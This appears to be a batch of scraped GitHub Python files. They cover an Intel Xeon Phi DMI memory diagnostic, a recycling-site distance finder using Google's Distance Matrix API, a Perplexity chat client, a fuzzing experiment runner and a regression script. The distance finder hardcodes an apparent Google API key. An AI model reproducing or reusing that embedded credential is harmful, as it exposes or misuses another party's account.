hex(entry["length"]),
hex(entry["handle"]),
entry["phys_mem"],
hex(entry["mem_err_info"]),
entry["total_width"],
entry["data_width"],
entry["size"],
hex(entry["form_factor"]),
hex(entry["dev_set"]),
entry["dev_locator"],
entry["bank_locator"],
hex(entry["mem_type"]),
hex(entry["type_det"]),
entry["speed"],
entry["manufacturer"],
entry["serial_num"],
entry["asset_tag"],
entry["part_num"],
hex(entry["attributes"]),
hex(entry["ext_size"]),
entry["conf_mem_speed"],
entry["min_volt"],
entry["max_volt"],
entry["conf_volt"])
contents.append(entry_contents)
contents_str = "".join(contents)
output = "{0} {1} {2}".format(header, contents_str, footer)
return output
def _process_dmi_file(self, fd):
""" Function that parses information from DMI File Type 17
"""
os.lseek(fd, 0, os.SEEK_SET)
table_type = struct.unpack('1B', os.read(fd, 1))[0]
length = struct.unpack('1B', os.read(fd, 1))[0]
handle = struct.unpack('1H', os.read(fd, 2))[0]
phys_mem = struct.unpack('1H', os.read(fd, 2))[0]
mem_err_info = struct.unpack('1H', os.read(fd, 2))[0]
total_width = struct.unpack('1H', os.read(fd, 2))[0]
data_width = struct.unpack('1H', os.read(fd, 2))[0]
size = struct.unpack('1H', os.read(fd, 2))[0]
form_factor = struct.unpack('1B', os.read(fd, 1))[0]
dev_set = struct.unpack('1B', os.read(fd, 1))[0]
dev_locator = struct.unpack('1B', os.read(fd, 1))[0]
bank_locator = struct.unpack('1B', os.read(fd, 1))[0]
mem_type = struct.unpack('1B', os.read(fd, 1))[0]
type_det = struct.unpack('1H', os.read(fd, 2))[0]
speed = struct.unpack('1H', os.read(fd, 2))[0]
manufacturer = struct.unpack('1B', os.read(fd, 1))[0]
serial_num = struct.unpack('1B', os.read(fd, 1))[0]
asset_tag = struct.unpack('1B', os.read(fd, 1))[0]
part_num = struct.unpack('1B', os.read(fd, 1))[0]
attributes = struct.unpack('1B', os.read(fd, 1))[0]
ext_size = struct.unpack('1I', os.read(fd, 4))[0]
conf_mem_speed = struct.unpack('1H', os.read(fd, 2))[0]
min_volt = struct.unpack('1H', os.read(fd, 2))[0]
max_volt = struct.unpack('1H', os.read(fd, 2))[0]
conf_volt = struct.unpack('1H', os.read(fd, 2))[0]
strings = self._get_strings_info(fd, length)
self.entries.append({"table_type": table_type,
"length": length,
"handle": handle,
"phys_mem": phys_mem,
"mem_err_info": mem_err_info,
"total_width": total_width,
"data_width": data_width,
# size Value Note:
# if Bit15 = 0 units are MB, else units are KB.
# if value = 0x7FFF atual size is in "ext_size"
# if value = 0xFFFF size unknown.
"size": size,
"form_factor": form_factor,
"dev_set": dev_set,
"dev_locator": strings[dev_locator].strip() if dev_locator < len(strings) else "",
"bank_locator": strings[bank_locator].strip() if bank_locator < len(strings) else "",
"mem_type": mem_type,
"type_det": type_det,
"speed": speed, # In MHz
"manufacturer": strings[manufacturer].strip() if manufacturer < len(strings) else "",
"serial_num": strings[serial_num].strip() if serial_num < len(strings) else "",
"asset_tag": strings[asset_tag].strip() if asset_tag < len(strings) else "",
"part_num": strings[part_num].strip() if part_num < len(strings) else "",
"attributes": attributes,
"ext_size": ext_size, # Only usable if size value = 0x7FFF. In MB
"conf_mem_speed": conf_mem_speed,
"min_volt": min_volt, # In mV
"max_volt": max_volt, # In mV
"conf_volt": conf_volt}) # In mV
class DMITableFactory(object):
"""Creates DMI Table Objects
Currently only tables 16 and 17 are supported.
"""
supported_types = dict()
supported_types[16] = DMITableType16
supported_types[17] = DMITableType17
@staticmethod
def get_table(table_type):
if table_type not in DMITableFactory.supported_types:
err_msg = "Table Type {0} is not supported!\n".format(table_type)
sys.stderr.write(err_msg)
raise DMIException(err_msg)
return DMITableFactory.supported_types[table_type]()
class Dimm(object):
"""Class that stores the DIMM information needed
"""
def __init__(self, entry):
self.type = MemType.UNKNOWN
self.mcdram_use = MCDRAMUse.UNKNOWN
self.size = 0 # In MB
self.speed = 0 # In MHz
self.conf_volt = 0 # In mV
if entry["form_factor"] == TYPE_17_FORM_FACTOR_CHIP or "mcdram" in entry["dev_locator"].lower():
self.type = MemType.MCDRAM
if entry["type_det"] & TYPE_17_TYPE_DETAIL_CACHE_DRAM:
self.mcdram_use = MCDRAMUse.CACHE
else:
self.mcdram_use = MCDRAMUse.SYSTEM
else:
self.type = MemType.DIMM
self.mcdram_use = MCDRAMUse.UNKNOWN
if entry["size"] == 0xFFFF:
self.size = 0
elif entry["size"] == 0x7FFF:
self.size = entry["ext_size"]
elif entry["size"] & 0x8000:
self.size = entry["size"] / 1024 # Value in KB, convert it to MB
else:
self.size = entry["size"]
self.speed = entry["speed"]
self.conf_volt = entry["conf_volt"]
class MemoryTopology(object):
"""Reads DMI tables 16 and 17 for memory information creates a dict for
each dimm module (incluiding empty dimm).
Then each dict is append to self.dimms, which can be iterated
Also reads the dmi-sysfs information to obtain the Memory, Cluster
and MCDRAM Cache configurations
"""
def __init__(self, args):
self.args = args
self.dimms = list()
self.mcdram_cache = 0
self.mcdram_system = 0
self.cluster_mode = "Unavailable"
self.memory_mode = "Unavailable"
self.mem_MCDRAM_cache_info = "Unavailable"
self._read_memory_information()
self._read_configuration_modes()
def __iter__(self):
for dimm in self.dimms:
yield dimm
def __len__(self):
return len(self.dimms)
def __str__(self):
return pprint.pformat(self.dimms)
def _read_memory_information(self):
"""Function that obtains the Memory Information and stores it in a list
of dictionaries, each containing the information for one handle of the
memory
"""
self.mcdram_cache = 0
self.mcdram_system = 0
try:
table_16_info = DMITableFactory.get_table(16)
table_17_info = DMITableFactory.get_table(17)
except DMIException as e:
sys.stderr.write("Error obtaining SMBIOS table information: {0}\n".format(e))
return
if not RUNNING_UT and self.args.verbosity >= 4: # If the debug level is high enough, print SMBIOS tables
sys.stdout.write(str(table_16_info))
sys.stdout.write(str(table_17_info))
for entry in table_16_info:
if entry["location"] == TYPE_16_LOCATION_OTHER:
if entry["max_cap"] == 0x80000000:
mcdram_mem = entry["ext_max_cap"] / (1024 * 1024) # Value in Bytes, convert it to MB
else:
mcdram_mem = entry["max_cap"] / 1024 # Value in KB, convert it to MB
if entry["use"] == TYPE_16_USE_SYSTEM:
self.mcdram_system += mcdram_mem
if entry["use"] == TYPE_16_USE_CACHE:
self.mcdram_cache += mcdram_mem
else:
continue
for entry in table_17_info:
self.dimms.append(Dimm(entry))
def _read_configuration_modes(self):
type_file_num = 0
while True:
if self._process_dmi_group_file(
DMI_FILENAME.format(DMI_GROUP_ASSOCIATIONS_TYPE.format(type_file_num))) == 1:
type_file_num += 1
else:
break
def _process_dmi_group_file(self, filename):
fd = None
try:
fd = os.open(filename, os.O_RDONLY)
type = struct.unpack('1B', os.read(fd, 1))[0]
length = struct.unpack('1B', os.read(fd, 1))[0]
os.lseek(fd, length, os.SEEK_SET)
name_str = os.read(fd, (len(DMI_GROUP_STRING) + max(len(DMI_SYS_KNL_GROUP_NAME), len(DMI_SYS_KNM_GROUP_NAME))))
if DMI_SYS_KNL_GROUP_NAME not in name_str and \
DMI_SYS_KNM_GROUP_NAME not in name_str:
return 1
members = (length - 5) / 3
os.lseek(fd, 5, os.SEEK_SET)
for x in range(0, members):
grp_type = struct.unpack('1B', os.read(fd, 1))[0]
grp_handle = struct.unpack('1H', os.read(fd, 2))[0]
if self._process_dmi_member_file(DMI_FILENAME.format(DMI_SYS_GENERAL_INFO_TYPE.format(grp_type))) == 0:
break
except OSError as e:
sys.stderr.write("Group Knights Landing Information not found on DMI sysfs: {0}\n".format(e))
return 2
except:
sys.stderr.write(
"Unknown Error detected while getting Knights Landing Information Group from DMI sysfs: {0}\n".format(
sys.exc_info()[0]))
return 2
finally:
if fd:
os.close(fd)
return 0
def _process_dmi_member_file(self, filename):
grp_fd = None
try:
grp_fd = os.open(filename, os.O_RDONLY)
os.lseek(grp_fd, 4, os.SEEK_SET)
member_id = struct.unpack('1B', os.read(grp_fd, 1))[0]
if member_id != 0x0001:
return 1
os.lseek(grp_fd, 7, os.SEEK_SET)
supported_cluster_mode = struct.unpack('1B', os.read(grp_fd, 1))[0]
conf_cluster_mode = struct.unpack('1B', os.read(grp_fd, 1))[0]
supported_memory_mode = struct.unpack('1B', os.read(grp_fd, 1))[0]
conf_memory_mode = struct.unpack('1B', os.read(grp_fd, 1))[0]
conf_MCDRAM_cache = struct.unpack('1B', os.read(grp_fd, 1))[0]
self.cluster_mode = self._cluster_mode(conf_cluster_mode)
self.memory_mode = self._memory_mode(conf_memory_mode)
self.mem_MCDRAM_cache_info = self._memory_MCDRAM_cache(conf_MCDRAM_cache)
except OSError as e:
sys.stderr.write("Member Knights Landing Information not found on DMI sysfs: {0}\n".format(e))
return 2
except:
sys.stderr.write(
"Unknown Error detected while getting Knights Landing Information Member from DMI sysfs: {0}\n".format(
sys.exc_info()[0]))
return 2
finally:
if grp_fd:
os.close(grp_fd)
return 0
def _cluster_mode(self, value):
if value == 0x01:
cluster_mode = "Quadrant"
elif value == 0x02:
cluster_mode = "Hemisphere"
elif value == 0x04:
cluster_mode = "SNC4"
elif value == 0x08:
cluster_mode = "SNC2"
elif value == 0x010:
cluster_mode = "ALL2ALL"
else:
cluster_mode = "Unavailable"
return cluster_mode
def _memory_mode(self, value):
if value == 0x01:
memory_mode = "Cache"
elif value == 0x02:
memory_mode = "Flat"
elif value == 0x04:
memory_mode = "Hybrid"
else:
memory_mode = "Unavailable"
return memory_mode
def _memory_MCDRAM_cache(self, value):
if value == 0x00:
mem_MCDRAM_cache_info = "No MCDRAM used as Cache"
elif value == 0x01:
mem_MCDRAM_cache_info = "25% of MCDRAM used as Cache"
elif value == 0x02:
mem_MCDRAM_cache_info = "50% of MCDRAM used as Cache"
elif value == 0x04:
mem_MCDRAM_cache_info = "100% of MCDRAM used as Cache"
else:
mem_MCDRAM_cache_info = "Unavailable"
return mem_MCDRAM_cache_info
def get_total_memory(self, mem_type):
size = 0
for dimm in self.dimms:
if dimm.type == mem_type:
size += dimm.size
return size
def get_MCDRAM_mem(self, use):
size = 0
for dimm in self.dimms:
if dimm.type == MemType.MCDRAM and dimm.mcdram_use == use:
size += dimm.size
if use == MCDRAMUse.CACHE:
if self.mcdram_cache != size:
sys.stdout.write("Note: MCDRAM Cache memory size '{0}'".format(self.mcdram_cache))
sys.stdout.write(" reported in SMBIOS Table 16 is different from")
sys.stdout.write(" the size '{0}' reported in Table 17.\n".format(size))
elif use == MCDRAMUse.SYSTEM:
if self.mcdram_system != size:
sys.stdout.write("Note: MCDRAM system memory size '{0}'".format(self.mcdram_system))
sys.stdout.write(" reported in SMBIOS Table 16 is different from")
sys.stdout.write(" the size '{0}' reported in Table 17.\n".format(size))
return size
def get_freq(self, mem_type):
freq = 0
for dimm in self.dimms:
if dimm.type == mem_type:
if freq == 0 or dimm.speed < freq:
freq = dimm.speed
return freq
def get_voltage(self, mem_type):
voltage = 0
for dimm in self.dimms:
if dimm.type == mem_type:
if voltage == 0 or dimm.conf_volt > voltage:
voltage = dimm.conf_volt
return voltage
def get_access(self, mem_type, mem_size, reserve_size=512):
access = MESSAGE_UNAVAILABLE
try:
stdout, stderr, return_code = run(FIND_LIBRARY_CMD.format(MEMKIND_LIBRARY))
stdout.strip()
stdout = stdout.splitlines()[0]
if return_code != 0 or not stdout:
sys.stderr.write(
"Error: library '{0}' not found using 'ldconfig' command. Make sure you have the library installed and that 'ldconfig' DB is updated \n".format(
MEMKIND_LIBRARY))
return access
lib_to_load = stdout.split("=>")[1].strip()
mem_kind = ctypes.cdll.LoadLibrary(lib_to_load)
except OSError as e:
sys.stderr.write("OSError while loading the library: {0}\n".format(e))
sys.stderr.write("Is library '" + MEMKIND_LIBRARY + "' correctly installed?\n")
return access
except Exception as e:
sys.stderr.write("Unexpected error while loading the library '" + MEMKIND_LIBRARY + "'. Exception: " + str(e) + "\n")
return access
if not mem_kind:
sys.stderr.write("Error: Library '" + MEMKIND_LIBRARY + "' was not loaded correctly\n")
return access
if mem_type == MemType.DIMM:
try:
if mem_size > 0:
big_list_1 = list(range(100000))
big_list_2 = copy.deepcopy(big_list_1)
del big_list_1
del big_list_2
else:
sys.stdout.write("Note: DDR memory size is zero. Cannot reserve DDR memory.\n")
return access
except:
sys.stderr.write("Error: Could not allocate DDR memory. Exception: " + str(sys.exc_info()[0]) + "\n")
access = MESSAGE_NOT_RESERVED.format("DDR")
return access
access = MESSAGE_AVAILABLE
elif mem_type == MemType.MCDRAM:
if self.memory_mode == "Cache" or "100%" in self.mem_MCDRAM_cache_info:
sys.stdout.write("Note: All MCDRAM memory is being used as Cache. Cannot reserve memory.\n")
return access
hbw_reserve_size = ctypes.c_size_t(reserve_size * 1024)
hbw_available = mem_kind.hbw_check_available()
if hbw_available == 0:
hbw_malloc = mem_kind.hbw_malloc
hbw_malloc.restype = ctypes.c_void_p
hbw_mem_ptr = hbw_malloc(hbw_reserve_size)
if hbw_mem_ptr != 0:
access = MESSAGE_AVAILABLE
hbw_free = mem_kind.hbw_free
hbw_free.argtypes = [ctypes.c_void_p]
hbw_free(hbw_mem_ptr)
else:
sys.stderr.write("Error: Could not allocate MCDRAM memory, libmemkind returned NULL pointer.\n")
access = MESSAGE_NOT_RESERVED.format("MCDRAM")
else:
if (
self.get_total_ddr_memory() == 0 and
self.get_memory_mode() == "Flat" and # When there are no DIMMs installed, the only supported Memory Mode is 'Flat'
self.get_sys_mcd_memory() > 0
):
sys.stdout.write("Note: There are no DDR DIMMs installed on the system.")
sys.stdout.write(" MCDRAM is being used as the only System Memory.")
sys.stdout.write(" Checking access to this memory.\n")
try:
big_list_1 = list(range(100000))
big_list_2 = copy.deepcopy(big_list_1)
del big_list_1
del big_list_2
except:
sys.stderr.write("Error: Could not allocate MCDRAM (as the only System Memory). Exception: " + str(sys.exc_info()[0]) + "\n")
access = MESSAGE_NOT_RESERVED.format("MCDRAM (as the only System Memory)")
return access
access = MESSAGE_AVAILABLE
elif mem_size > 0:
sys.stderr.write("Error: MCDRAM memory size is greater than zero")
sys.stderr.write(" but libmemkind reported that is not available.")
sys.stderr.write(" Return code: {0}\n".format(hbw_available))
access = MESSAGE_NOT_RESERVED.format("MCDRAM")
else:
access = MESSAGE_UNAVAILABLE
else:
access = MESSAGE_UNAVAILABLE
return access
def get_total_ddr_memory(self):
return self.get_total_memory(MemType.DIMM)
def get_total_mcd_memory(self):
return self.get_total_memory(MemType.MCDRAM)
def get_cache_mcd_memory(self):
return self.get_MCDRAM_mem(MCDRAMUse.CACHE)
def get_sys_mcd_memory(self):
return self.get_MCDRAM_mem(MCDRAMUse.SYSTEM)
def get_ddr_freq(self):
return self.get_freq(MemType.DIMM)
def get_mcd_freq(self):
return self.get_freq(MemType.MCDRAM)
def get_ddr_voltage(self):
return self.get_voltage(MemType.DIMM)
def get_mcd_voltage(self):
return self.get_voltage(MemType.MCDRAM)
def get_ddr_access(self, mem_size):
return self.get_access(MemType.DIMM, mem_size)
def get_mcd_access(self, mem_size):
return self.get_access(MemType.MCDRAM, mem_size)
def get_cluster_mode(self):
return self.cluster_mode
def get_memory_mode(self):
return self.memory_mode
def get_MCDRAM_cache_info(self):
return self.mem_MCDRAM_cache_info
class DMIException(Exception):
pass
class MemType:
UNKNOWN, DIMM, MCDRAM = range(3)
class MCDRAMUse:
UNKNOWN, SYSTEM, CACHE = range(3)
def print_memory_config(memory_config, memMCDRAMCache):
""" Prints the Memory Configuration from dmi-sysfs (BIOS)
"""
mem_cfg = "Memory Configuration is: {0}".format(memory_config)
mcdram_cache = "MCDRAM Configured as Cache is: {0}".format(memMCDRAMCache)
sys.stdout.write(mem_cfg)
sys.stdout.write("\n")
sys.stdout.write(mcdram_cache)
sys.stdout.write("\n")
def print_cluster_config(clusterConfig):
""" Prints the Cluster Configuration from dmi-sysfs (BIOS)
"""
cluster_cfg = "Cluster Configuration is: {0}".format(clusterConfig)
sys.stdout.write(cluster_cfg)
sys.stdout.write("\n")
def print_memory_info(mem_type, size, speed, freq, volt, access="Not Available", mcdram_cache=0, mcdram_sys=0):
mem_header = "*************** {0} Info ***************\n".format(mem_type)
mem_footer = "{0}\n".format(("*" * len(mem_header)))
if 0 == size:
size_str = "Not Available"
else:
size_str = "{0} MB".format(size)
if 0 == speed:
speed_str = "Not Available"
else:
speed_str = "{0} GT/s".format(speed)
if 0 == freq:
freq_str = "Not Available"
else:
freq_str = "{0} MHz".format(freq)
if 0 == volt:
volt_str = "Not Available"
else:
volt_str = "{0} V".format(volt)
mcdram_cache_str = "{0} MB".format(mcdram_cache)
mcdram_sys_str = "{0} MB".format(mcdram_sys)
sys.stdout.write(mem_header)
sys.stdout.write("Total {0} Memory: {1}\n".format(mem_type, size_str))
if mem_type == "MCDRAM":
sys.stdout.write(" {0} Used as Cache: {1}\n".format(mem_type, mcdram_cache_str))
sys.stdout.write(" {0} Used as System Memory: {1}\n".format(mem_type, mcdram_sys_str))
sys.stdout.write("{0} Speed: {1}\n".format(mem_type, speed_str))
sys.stdout.write("{0} Frecuency: {1}\n".format(mem_type, freq_str))
sys.stdout.write("{0} Voltage: {1}\n".format(mem_type, volt_str))
if mem_type == "MCDRAM":
sys.stdout.write("{0} Access(R/W) (Only for MCDRAM used as System Memory): {1}\n".format(mem_type, access))
else:
sys.stdout.write("{0} Access(R/W): {1}\n".format(mem_type, access))
sys.stdout.write(mem_footer)
def test_memory_info(args):
dimms = MemoryTopology(args)
# Get Memory and Cluster configurations
cluster_config = dimms.get_cluster_mode()
memory_config = dimms.get_memory_mode()
mem_MCDRAM_cache = dimms.get_MCDRAM_cache_info()
# Get DDR Info
ddr_size = dimms.get_total_ddr_memory()
ddr_freq = dimms.get_ddr_freq()
# Convert to GigaTransfers
# TODO: Make sure this conversion is correct for all the cases
ddr_speed = float(ddr_freq) / 1000
ddr_volt = dimms.get_ddr_voltage()
ddr_access = dimms.get_ddr_access(ddr_size)
# Get MCDRAM info
mcd_size = dimms.get_total_mcd_memory()
mcd_cache = dimms.get_cache_mcd_memory()
mcd_sys = dimms.get_sys_mcd_memory()
mcd_freq = dimms.get_mcd_freq()
# Convert to GigaTransfers
# TODO: Make sure this conversion is correct for all the cases
mcd_speed = float(mcd_freq) / 1000
mcd_volt = dimms.get_mcd_voltage()
mcd_access = dimms.get_mcd_access(mcd_size)
sys.stdout.write("Total Memory: {0} MB\n".format(ddr_size + mcd_size))
print_memory_config(memory_config, mem_MCDRAM_cache)
print_cluster_config(cluster_config)
print_memory_info("DDR", ddr_size, ddr_speed, ddr_freq, ddr_volt, ddr_access)
print_memory_info("MCDRAM", mcd_size, mcd_speed, mcd_freq, mcd_volt, mcd_access, mcd_cache, mcd_sys)
return 0
| antoinecarme/xeon-phi-data | intel_software/pkg_contents/sysdiag/CONTENTS/usr/share/sysdiag/diag_memory.py | diag_memory.py | py | 33,354 | python | en | code | 1 | github-code | 36 |
20306864607 | #!/usr/bin/python
'''
Filename: distance.py
Contributors: Todd Boone II, Jackson Brietzke, Jonah Woods, Andrew Zolintakis, Frank Longo, Peter Awori
Description: Enables the CanCan application to retrieve distance
information from Google's Distance Matrix API.
Modules
Imported: requests
difflib
creating_materials (created by us)
Imported By: gui.py
References: https://developers.google.com/maps/documentation/distance-matrix/intro
http://docs.python-requests.org/en/latest/api/
'''
import requests
import difflib
import creating_materials
GOOGLE_DISTANCE_API_URL = 'https://maps.googleapis.com/maps/api/distancematrix/json?'
API_KEY = 'AIzaSyC6ELq9yvgnhnmnnMhfmfPHRBQ6KVjSfMY'
# Initialize recycling locations
recyclingLocations = creating_materials.create_locations_df()
# Map GUI category names to creating_materials material name
def categorySwitcher(category):
switcher={
'Aluminum':'Scrap Metals',
'Battery':'Batteries',
'Computers':'Computers',
'E-Cycling':'Electronics',
'Glass':'Construction',
'Mobile':'Mobile Phones',
'Paper':'Household',
'Plastic':'Plastic',
'Tires':'Tires',
'Waste':'Construction'
}
return switcher.get(category,"")
# Retrieve full Google Distance Matrix API Response
def getDistanceInfo(origin, destination):
'''
Add necessary params to params dict
Paramters:
{origin} - starting point for calculating travel distance and time
{destination} - finishing point for calculating travel distance and time
{units} - specify unit system, options: 'imperial' or 'metric'(default)
{key} - API_KEY
'''
params = {
'origins': origin,
'destinations': destination,
'units': 'imperial',
'key': API_KEY
}
# Make the API request and store response, else print error and exit
try:
response = requests.get(GOOGLE_DISTANCE_API_URL, params=params)
distanceResponse = response.json()
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
return distanceResponse
# Retrieve the list of destination addresses
def getAddress(distanceResponse):
address = []
# Retrieve miles from response
try:
for currentAddress in distanceResponse['destination_addresses']:
address.append(currentAddress)
except:
if distanceResponse['status'] == 'ZERO_RESULTS':
error = 'The distance could not be calculated. Try a different address.'
return error
return address
# Retrieve the list of miles in between origin and destination
def getMiles(distanceResponse):
distance = []
# Retrieve miles from response
try:
for element in distanceResponse['rows'][0]['elements']:
for key, val in element['distance'].items():
if key == 'text':
distance.append(val)
except:
if distanceResponse['rows'][0]['elements'][0]['status'] == 'ZERO_RESULTS':
error = 'The miles could not be calculated. Try a different address.'
return error
return distance
# Retrieve the list of duration times in between origin and destination
def getDuration(distanceResponse):
duration = []
# Retrieve duration from response
try:
for element in distanceResponse['rows'][0]['elements']:
for key, val in element['duration'].items():
if key == 'text':
duration.append(val)
except:
if distanceResponse['rows'][0]['elements'][0]['status'] == 'ZERO_RESULTS':
error = 'The duration could not be calculated. Try a different address.'
return error
return duration
# Retrieve the list of duration values in between origin and destination
def getDurationValue(distanceResponse):
durationValue = []
# Retrieve duration from response
try:
for element in distanceResponse['rows'][0]['elements']:
for key, val in element['duration'].items():
if key == 'value':
durationValue.append(val)
except:
if distanceResponse['rows'][0]['elements'][0]['status'] == 'ZERO_RESULTS':
error = 'The duration value could not be calculated. Try a different address.'
return error
return durationValue
# Get a dictionary of closest location
def getClosestLocation(origin, destination):
closestIndex = ''
# Retrieve Distance Response
distanceResponse = getDistanceInfo(origin, destination)
# Get lists of corresponding addresses, miles, duration, and duration values
address = getAddress(distanceResponse)
miles = getMiles(distanceResponse)
duration = getDuration(distanceResponse)
durationValue = getDurationValue(distanceResponse)
# Find the index of closest address
closestIndex = durationValue.index(min(durationValue))
# Create a dictionary that holds informatiion about the closest location
closestLocation = {
'address': address[closestIndex],
'miles': miles[closestIndex],
'duration': duration[closestIndex]
}
return closestLocation
# Get a full dictionary that represents closest info to display on application
def getClosestAppropriateLocation(origin='Heinz College', material = ''):
'''
Retrieve closest location that can accept specified material
'''
# Map GUI category names to creating_materials material name
material = categorySwitcher(material)
# Retrieve and format list of all approriate locations
appropriateLocations = creating_materials.find_locations_that_accept_material(recyclingLocations, material)
listOfAddresses = []
for locations in appropriateLocations:
listOfAddresses.append(locations['location_address'])
formattedListOfAddresses = "|".join(listOfAddresses) # format for Google Distance Matrix API
'''
Get the closest appropriate location in the following format:
closestAppropriateLocationDict = {
'address': address[closestIndex],
'miles': miles[closestIndex],
'duration': duration[closestIndex]
}
'''
closestAppropriateLocationDict = getClosestLocation(origin, formattedListOfAddresses)
# Append the name of the place at appropriate address
for place in appropriateLocations:
if place['location_address'] == difflib.get_close_matches(closestAppropriateLocationDict['address'], listOfAddresses)[0]:
closestAppropriateLocationDict['name'] = place['location_name']
return closestAppropriateLocationDict
if __name__ == "__main__":
'''
Testing getClosestAppropriateLocation() functionality
'''
print("Enter an address. We will find the closest facility to you that can accept Batteries.\n")
origin = input('Enter an origin address: ')
material = "Batteries"
closestAppropriateLocationDict = getClosestAppropriateLocation(origin, material)
print("Name: " + str(closestAppropriateLocationDict.get('name')))
print("Address: " + str(closestAppropriateLocationDict.get('address')))
print("Miles: " + str(closestAppropriateLocationDict.get('miles')))
print("Duration: " + str(closestAppropriateLocationDict.get('duration')))
# End Testing getClosestAppropriateLocation() functionality
| toddbooneii/cancan | distance.py | distance.py | py | 6,739 | python | en | code | 0 | github-code | 36 |
22340501918 | import os
import json
import requests
import sys
import readline
# Constants
URL = "https://api.perplexity.ai/chat/completions"
HEADERS = {
"accept": "text/event-stream",
"content-type": "application/json",
"authorization": f"Bearer {os.getenv('PERPLEXITY_API_KEY')}"
}
def get_input(prompt):
try:
# Use readline for input (for TTY)
return input(prompt)
except EOFError:
return None
def stream_request(messages):
last_printed = "" # Variable to keep track of the last printed message
payload = {
"model": "pplx-70b-chat-alpha",
"messages": messages,
"stream": True
}
with requests.post(URL, headers=HEADERS, json=payload, stream=True) as response:
response.raise_for_status()
sys.stdout.write("Assistant: ")
for line in response.iter_lines():
if line:
decoded_line = line.decode('utf-8').replace('data: ', '')
try:
data = json.loads(decoded_line)
current_content = data['choices'][0]['message']['content']
if current_content != last_printed: # Update only if there is new content
new_content = current_content[len(last_printed):]
if new_content: # Only update if new content is not empty
sys.stdout.write(new_content)
sys.stdout.flush() # Flush the buffer to immediately print the new content
last_printed = current_content
except json.JSONDecodeError:
continue
print() # Print a new line after full response is received
def main():
print("Perplexity Chat Bot")
print("-------------------")
print("Type 'exit' to end the chat.")
while True:
user_input = get_input("You: ")
if user_input is None or user_input.lower().strip() == 'exit':
print("Goodbye!")
break
messages = [
{
"role": "system",
"content": "Be precise and concise."
},
{
"role": "user",
"content": user_input
}
]
stream_request(messages)
if __name__ == "__main__":
main()
| piercecohen1/pplx-api-streaming | pplxchat.py | pplxchat.py | py | 2,331 | python | en | code | 0 | github-code | 36 |
44145537078 | import time
import copy
import os
from integrate_all_commits_libs import current_libs
from ExperimentRunner import Logger, save_leftover_libs, init_directory, ExpRunner
RUN_NAME = "test_run_1"
SAVE_DIRECTORY = f"/home/forian/uni/{RUN_NAME}"
FUZZBENCH_DIRECTORY = "/home/forian/uni/fuzzbench"
TEST_RUN_TIMEOUT = 300 # the time a single experiment has building
DEBUG = False # checks whether the logged errors should be printed aswell
OSS_LIBRARIES = current_libs # OSS_LIBRARIES to run
# The libraries should have the format: {'project': [ ([fuzz_targets], commit1, date1), ... ]}
def main() -> int:
# create directory, if they don't already exist
init_directory(SAVE_DIRECTORY)
# define logger and Experiment runner
logger = Logger(save_directory=os.path.join(SAVE_DIRECTORY, 'log'), debug=DEBUG)
exp_runner = ExpRunner(test_run_timeout=TEST_RUN_TIMEOUT, fuzzbench_path=FUZZBENCH_DIRECTORY,
save_path=SAVE_DIRECTORY, logger=logger)
# copy libraries, so they don't interfere with the loop items
oss_libraries = copy.deepcopy(OSS_LIBRARIES)
if not oss_libraries:
logger.log("I'm done ... There are no experiments left to integrate and test.")
return 1
exception_counter = 0
timeout_counter = 0
system_pruned = True
n = 0
# start of the main loop
for project, values in OSS_LIBRARIES.items():
for (fuzz_target_list, commit_hash, date) in values:
for fuzz_target in fuzz_target_list:
n += 1
experiment_name = f'{project}__{fuzz_target}__{commit_hash}__{date}'
logger.log(f'\n\n{n}. running {experiment_name}')
logger.log(f'{time.ctime()}')
# if the system has been pruned give more time, since the base image needs to be reinstalled
if system_pruned:
res = exp_runner.run_experiment(project, fuzz_target, commit_hash, date,
timeout=2 * TEST_RUN_TIMEOUT, cleanup=True)
system_pruned = False
else:
res = exp_runner.run_experiment(project, fuzz_target, commit_hash, date, cleanup=True)
if res:
timeout_counter += 1
else:
exception_counter += 1
# every x-th run prune the system
# if n % 25 == 0:
# p1 = run('docker system prune -f')
# log(DEBUG, str(p1.stdout.decode()))
# system_pruned = True
if n > 25:
break
# pop the experiment from the list and save all libraries still to do (in case of crash)
oss_libraries.pop(project)
save_leftover_libs('integrate_all_commits_libs.py', oss_libraries)
logger.log("------------------------------------------ Finished ------------------------------------------")
logger.log(f"Exception counter: {exception_counter}")
logger.log(f"Timeout counter: {timeout_counter}")
logger.log(f"Total counter: {n}")
return 0
if __name__ == "__main__":
print("Starting the experiment ...")
x = main()
exit(x)
| ninjafail/format_fuzzer_experiments | integrate_all/integrate_all_commits.py | integrate_all_commits.py | py | 3,261 | python | en | code | 1 | github-code | 36 |
73685012263 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.preprocessing import StandardScaler,PolynomialFeatures
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder, Binarizer
from sklearn import linear_model
from sklearn.metrics import mean_squared_error,r2_score
train = pd.read_csv('train_NIR5Yl1.csv')
train.head()
train.drop(['ID','Username'],axis=1,inplace=True)
bn = Binarizer(threshold=5)
pd_watched = bn.transform([train['Answers']])[0]
train['pd_watched'] = pd_watched
le = LabelEncoder()
train['Tag'] = le.fit_transform(train['Tag'])
print(train.head())
X=train.drop('Upvotes',axis=1)
y=train['Upvotes']
std=StandardScaler()
X_scaled=pd.DataFrame(std.fit_transform(X),columns=X.columns,index=X.index)
ts = 0.24
rs = 205
X_train, X_val, y_train, y_val = train_test_split(X_scaled, y, test_size=ts, random_state=rs)
print(X_train.head())
print(X_val.head())
poly_reg=PolynomialFeatures(degree=4,include_bias=True,interaction_only=False)
X_poly_train = poly_reg.fit_transform(X_train)
X_poly_train = pd.DataFrame(X_poly_train)
X_poly_val = poly_reg.fit_transform(X_val)
X_poly_val = pd.DataFrame(X_poly_val)
alp = 0.027
lin_reg_1 = linear_model.LassoLars(alpha=alp,max_iter=150)
lin_reg_1.fit(X_poly_train,y_train)
pred_train = lin_reg_1.predict(X_poly_train)
print('Train R2:',r2_score(y_train, pred_train))
print('Train RMSE:',np.sqrt(mean_squared_error(y_train, pred_train)))
pred_val = lin_reg_1.predict(X_poly_val)
print('Val R2:',r2_score(y_val, pred_val))
print('Val RMSE:',np.sqrt(mean_squared_error(y_val, pred_val)))
test = pd.read_csv('test_8i3B3FC.csv')
ID = test['ID']
test.drop(['ID','Username'],axis=1,inplace=True)
test['Tag'] = le.fit_transform(test['Tag'])
pd_watched = bn.transform([test['Answers']])[0]
test['pd_watched'] = pd_watched
test_scaled=pd.DataFrame(std.fit_transform(test),columns=test.columns,index=test.index)
